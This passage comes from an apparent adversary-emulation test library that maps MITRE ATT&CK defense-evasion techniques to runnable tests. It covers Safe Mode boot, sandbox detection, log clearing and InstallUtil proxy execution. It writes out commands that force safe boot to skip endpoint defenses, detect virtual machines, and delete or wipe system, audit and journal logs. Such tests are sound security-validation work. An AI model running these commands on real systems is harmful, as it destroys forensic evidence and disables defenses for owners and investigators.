url: https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise
- source_name: Sophos Snatch Ransomware 2019
description: Sophos. (2019, December 9). Snatch ransomware reboots PCs into
Safe Mode to bypass protection. Retrieved June 23, 2021.
url: https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:33.044Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)
Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jorell Magtibay, National Australia Bank Limited
- Kiyohito Yamamoto, RedLark, NTT Communications
- Yusuke Kubo, RedLark, NTT Communications
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1562.009
atomic_tests:
- name: Safe Mode Boot
auto_generated_guid: 2a78362e-b79a-4482-8e24-be397bce4d85
description: Allows adversaries to abuse safe mode to disable endpoint defenses
that may not start with limited boot
supported_platforms:
- windows
executor:
command: bcdedit /set safeboot network
cleanup_command: bcdedit /deletevalue {current} safeboot
name: command_prompt
elevation_required: true
T1542.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4
created: '2020-10-20T00:06:56.180Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1542/005
external_id: T1542.005
- source_name: Cisco Blog Legacy Device Attacks
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
- source_name: Cisco IOS Software Integrity Assurance - Secure Boot
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure
Boot. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35
- source_name: Cisco IOS Software Integrity Assurance - Image File Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Image File Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
- source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
- source_name: Cisco IOS Software Integrity Assurance - Command History
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
History. Retrieved October 21, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
- source_name: Cisco IOS Software Integrity Assurance - Boot Information
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:33.317Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.1'
atomic_tests: []
T1497.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--29be378d-262d-4e99-b00d-852d573628e6
created: '2020-03-06T20:57:37.959Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1497/001
external_id: T1497.001
- source_name: Unit 42 OilRig Sept 2018
description: Falcone, R., et al. (2018, September 04). OilRig Targets a Middle
Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September
24, 2018.
url: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/
- source_name: McAfee Virtual Jan 2017
description: Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual
Machine. Retrieved April 17, 2019.
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
September 13, 2024.
url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:33.591Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
based on the results of checks for the presence of artifacts indicative of
a virtual machine environment (VME) or sandbox. If the adversary detects a
VME, they may alter their malware to disengage from the victim or conceal
the core functions of the implant. They may also search for VME artifacts
before dropping secondary or additional payloads. Adversaries may use the
information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
during automated discovery to shape follow-on behaviors.(Citation: Deloitte
Environment Awareness)\n\nSpecific checks will vary based on the target and/or
adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047),
[PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information
Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012)
to obtain system information and search for VME artifacts. Adversaries may
search for VME artifacts in memory, processes, file system, hardware, and/or
the Registry. Adversaries may use scripting to automate these checks into
one script and then have the program exit if it determines the system to be
a virtual environment. \n\nChecks could include generic system properties
such as host/domain name and samples of network traffic. Adversaries may also
check the network adapters addresses, CPU core count, and available memory/drive
size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)
to check if it was saved in a folder or file with unexpected or even analysis-related
naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks
may enumerate services running that are unique to these applications, installed
programs on the system, manufacturer/product fields for strings relating to
virtual machine applications, and VME-specific hardware/processor instructions.(Citation:
McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also
use a special I/O port to send commands and receive output. \n \nHardware
checks, such as the presence of the fan, temperature, and audio devices, could
also be used to gather evidence that can be indicative a virtual environment.
Adversaries may also query for specific readings from these devices.(Citation:
Unit 42 OilRig Sept 2018)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Deloitte Threat Library Team
- Kostya Vasilkov
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '2.3'
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (Linux)
auto_generated_guid: dfbd1a21-540d-4574-9731-e852bd6fe840
description: |
systemd-detect-virt detects execution in a virtualized environment.
At boot, dmesg stores a log if a hypervisor is detected.
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
- name: Detect Virtualization Environment (FreeBSD)
auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd
description: |
Detects execution in a virtualized environment.
At boot, dmesg stores a log if a hypervisor is detected.
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization
Environment detected"; fi
'
- name: Detect Virtualization Environment (Windows)
auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
description: 'Windows Management Instrumentation(WMI) objects contains system
information which helps to detect virtualization. This command will specifically
attempt to get the CurrentTemperature value from this object and will check
to see if the attempt results in an error that contains the word supported.
This is meant to find the result of Not supported, which is the result if
run in a virtual machine
'
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$error.clear()
Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
if($error) {echo "Virtualization Environment detected"}
cleanup_command: "$error.clear()\n"
- name: Detect Virtualization Environment via ioreg
auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
description: 'ioreg contains registry entries for all the device drivers in
the system. If it''s a virtual machine, one of the device manufacturer will
be a Virtualization Software.
'
supported_platforms:
- macos
executor:
name: sh
elevation_required: false
command: 'if (ioreg -l | grep -e Manufacturer -e ''Vendor Name'' | grep -iE
''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
detected''; fi;
'
- name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)
auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78
description: "Windows Management Instrumentation(WMI) objects contain system
information which helps to detect virtualization. This test will get the model
and manufacturer of the machine to determine if it is a virtual machine, such
as through VMware or VirtualBox. \n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Manufacturer"
$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Model"
if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
- name: Detect Virtualization Environment using sysctl (hw.model)
auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c
description: |
sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
but will return the hypervisor name (VMware7,0).
Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo
''Virtualization Environment detected''; fi;
'
- name: Check if System Integrity Protection is enabled
auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945
description: "The latest versions of macOS have the System Integrity Protection
feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring
purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware
may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo
''Possible Virtualization Environment detected''; fi;
'
- name: Detect Virtualization Environment using system_profiler
auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f
description: "system_profiler provides system hardware and software configuration
and the Model Identifier should provide the value similar to (sysctl -n hw.model).
\nWe should be able to find whether virtualization is enabled by checking
whether the Model Identifier does not contain \"Mac\".\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier"
| grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected'';
fi;
'
T1070.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36
created: '2020-01-28T17:11:54.034Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1070/002
external_id: T1070.002
- source_name: Linux Logs
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:34.441Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* /var/log/messages:: General and system-related messages
* /var/log/secure or /var/log/auth.log: Authentication logs
* /var/log/utmp or /var/log/wtmp: Login records
* /var/log/kern.log: Kernel logs
* /var/log/cron.log: Crond logs
* /var/log/maillog: Mail server logs
* /var/log/httpd/: Web server access and error logs
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '1.0'
identifier: T1070.002
atomic_tests:
- name: rm -rf
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
description: 'Delete system and audit logs
'
supported_platforms:
- macos
- linux
input_arguments:
syslog_path:
description: path of syslog file to delete. On macos it's /var/log/system.log*,
on linux, it's /var/log/syslog*. Also note for File events, that on macos,
/var/ is a link to /private/var/.
type: string
default: "/var/log/system.log"
macos_audit_path:
description: path of audit file to delete
type: string
default: "/var/audit/20220725213300.202208110700021"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
&& stat #{syslog_path}
'
get_prereq_command: |
touch #{syslog_path}
if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: rm -rf
auto_generated_guid: bd8ccc45-d632-481e-b7cf-c467627d68f9
description: 'Delete messages and security logs
'
supported_platforms:
- linux
executor:
command: |
rm -rf /var/log/messages
rm -rf /var/log/security
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
auto_generated_guid: 653d39cd-bae7-499a-898c-9fb96b8b5cd1
description: 'This test deletes main log datastore, inflight log data, time-to-live
data(TTL), fault and error content
'
supported_platforms:
- macos
executor:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
auto_generated_guid: 6290f8a8-8ee9-4661-b9cf-390031bf6973
description: 'This test truncates the system log files using the truncate utility
with (-s 0) parameter which sets file size to zero, thus emptying the file
content
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path of system log to delete.
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'sudo truncate -s 0 #{system_log_path} #size parameter shorthand
'
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility (freebsd)
auto_generated_guid: 14033063-ee04-4eaf-8f5d-ba07ca7a097c
description: 'This test truncates the system log files using the truncate utility
with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying
the file content
'
supported_platforms:
- linux
executor:
command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate
--size=0 /var/log/security #size parameter \n"
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
auto_generated_guid: c23bdb88-928d-493e-b46d-df2906a50941
description: 'The first sub-test truncates the log file to zero bytes via /dev/null
and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero,
using cat utility
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path of system log to delete.
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: |
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
auto_generated_guid: 369878c6-fb04-48d6-8fc2-da9d97b3e054
description: 'The first sub-test truncates the log file to zero bytes via /dev/null
and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero,
using cat utility
'
supported_platforms:
- linux
executor:
command: |
cat /dev/null > /var/log/messages #truncating the file to zero bytes
cat /dev/zero > /var/log/messages #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
auto_generated_guid: bc8eeb4a-cc3e-45ec-aa6e-41e973da2558
description: 'This test finds and deletes the system log files within /var/log/
directory using various executions(rm, shred, unlink)
'
supported_platforms:
- macos
input_arguments:
system_log_name1:
description: name or prefix of system log to delete.
type: string
default: system.log
system_log_name2:
description: name or prefix of system log to delete.
type: string
default: system.log.97.gz
system_log_name3:
description: name or prefix of system log to delete.
type: string
default: system.log.98.gz
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2}
/var/log/#{system_log_name3}
'
get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2}
/var/log/#{system_log_name3}
'
executor:
command: |
sudo find /var/log -name '#{system_log_name1}*' -exec rm {} \; #using "rm" execution
sudo find /var/log -name "#{system_log_name2}*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log -name "#{system_log_name3}*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
auto_generated_guid: '0208ea60-98f1-4e8c-8052-930dce8f742c'
description: 'This test overwrites the contents of system log file with an empty
string using echo utility
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
executor:
command: 'sudo echo '''' > #{system_log_path}
'
name: sh
elevation_required: true
- name: Overwrite FreeBSD system log via echo utility
auto_generated_guid: 11cb8ee1-97fb-4960-8587-69b8388ee9d9
description: 'This test overwrites the contents of system log file with an empty
string using echo utility
'
supported_platforms:
- linux
executor:
command: 'echo '''' > /var/log/messages
'
name: sh
elevation_required: true
- name: Real-time system log clearance/deletion
auto_generated_guid: 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c
description: 'This test reads real-time system log file and writes empty string
to it, thus clearing the log file without tampering with the logging process
'
supported_platforms:
- macos
executor:
command: 'sudo log -f /var/log/system.log | : > /var/log/system.log
'
name: sh
elevation_required: true
- name: Delete system log files via unlink utility
auto_generated_guid: 03013b4b-01db-437d-909b-1fdaa5010ee8
description: 'This test deletes the system log file using unlink utility
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'sudo unlink #{system_log_path}
'
name: sh
elevation_required: true
- name: Delete system log files via unlink utility (freebsd)
auto_generated_guid: 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2
description: 'This test deletes the messages log file using unlink utility
'
supported_platforms:
- linux
executor:
command: 'unlink /var/log/messages
'
name: sh
elevation_required: true
- name: Delete system log files using shred utility
auto_generated_guid: 86f0e4d5-3ca7-45fb-829d-4eda32b232bb
description: 'This test overwrites the contents of the log file with zero bytes(-z)
using three passes(-n 3) of data, and then delete the file(-u) securely
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'sudo shred -u -z -n 3 #{system_log_path}
'
name: sh
elevation_required: true
- name: Delete system log files using srm utility
auto_generated_guid: b0768a5e-0f32-4e75-ae5b-d036edcf96b6
description: |
This test securely deletes the system log files individually and recursively using the srm utility.
Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
system_log_folder:
description: path to log parent folder
type: string
default: "/var/log/"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path} #{system_log_folder}
'
get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path}
#{system_log_folder}/system.log
'
executor:
command: |
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
auto_generated_guid: 810a465f-cd4f-47bc-b43e-d2de3b033ecc
description: 'This test deletes the system log file using osascript via "do
shell script"(sh/bash by default) which in-turn spawns rm utility, requires
admin privileges
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator
privileges''
'
name: sh
elevation_required: true
- name: Delete system log files using Applescript
auto_generated_guid: e62f8694-cbc7-468f-862c-b10cd07e1757
description: |
This test deletes the system log file using applescript using osascript via Finder application
Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework.
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"''
'
name: sh
elevation_required: true
- name: Delete system journal logs via rm and journalctl utilities
auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf
description: 'The first sub-test deletes the journal files using rm utility
in the "/var/log/journal/" directory and the second sub-test clears the journal
by modifiying time period of logs that should be retained to zero.
'
supported_platforms:
- linux
input_arguments:
journal_folder:
description: path to journal logs
type: string
default: "/var/log/journal"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{journal_folder}
'
get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
'
executor:
command: |
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
- name: Overwrite Linux Mail Spool
auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
description: 'This test overwrites the Linux mail spool of a specified user.
This technique was used by threat actor Rocke during the exploitation of Linux
web servers.
'
supported_platforms:
- linux
input_arguments:
username:
description: Username of mail spool
type: string
default: root
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat /var/spool/mail/#{username}
'
get_prereq_command: 'touch /var/spool/mail/#{username}
'
executor:
elevation_required: true
command: 'echo 0> /var/spool/mail/#{username}
'
name: bash
- name: Overwrite Linux Log
auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5
description: 'This test overwrites the specified log. This technique was used
by threat actor Rocke during the exploitation of Linux web servers.
'
supported_platforms:
- linux
input_arguments:
log_path:
description: Path of specified log
type: path
default: "/var/log/secure"
executor:
command: 'echo 0> #{log_path}
'
name: bash
elevation_required: true
cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path}
; fi
'
T1218.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2cd950a6-16c4-404a-aa01-044322395107
created: '2020-01-23T19:09:48.811Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/004
external_id: T1218.004
- source_name: MSDN InstallUtil
description: Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved
July 1, 2016.
url: https://msdn.microsoft.com/en-us/library/50614e95.aspx
- source_name: LOLBAS Installutil
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:34.798Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Casey Smith
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1218.004
atomic_tests:
- name: CheckIfInstallable method call
auto_generated_guid: ffd9c807-d402-47d2-879d-f915cf2a3a94
description: |
Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
If no output is displayed the test executed successfuly.
supported_platforms:
- windows
input_arguments:
test_harness:
description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly
type: path
default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1
assembly_dir:
description: directory to drop the compiled installer assembly
type: path
default: "$Env:TEMP\\"
invocation_method:
description: the type of InstallUtil invocation variant - Executable, InstallHelper,
or CheckIfInstallable
type: string
default: CheckIfInstallable
assembly_filename:
description: filename of the compiled installer assembly
type: string
default: T1218.004.dll
dependencies:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
'
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{test_harness}") -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
executor:
command: |
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. "#{test_harness}"
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
$ExpectedOutput = 'Constructor_'
$TestArgs = @{
OutputAssemblyDirectory = $InstallerAssemblyDir
OutputAssemblyFileName = $InstallerAssemblyFileName
InvocationMethod = '#{invocation_method}'
}
$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly
if ($ActualOutput -ne $ExpectedOutput) {
throw @"
CheckIfInstallable method execution test failure. Installer assembly execution output did not match the expected output.
Expected: $ExpectedOutput
Actual: $ActualOutput
"@
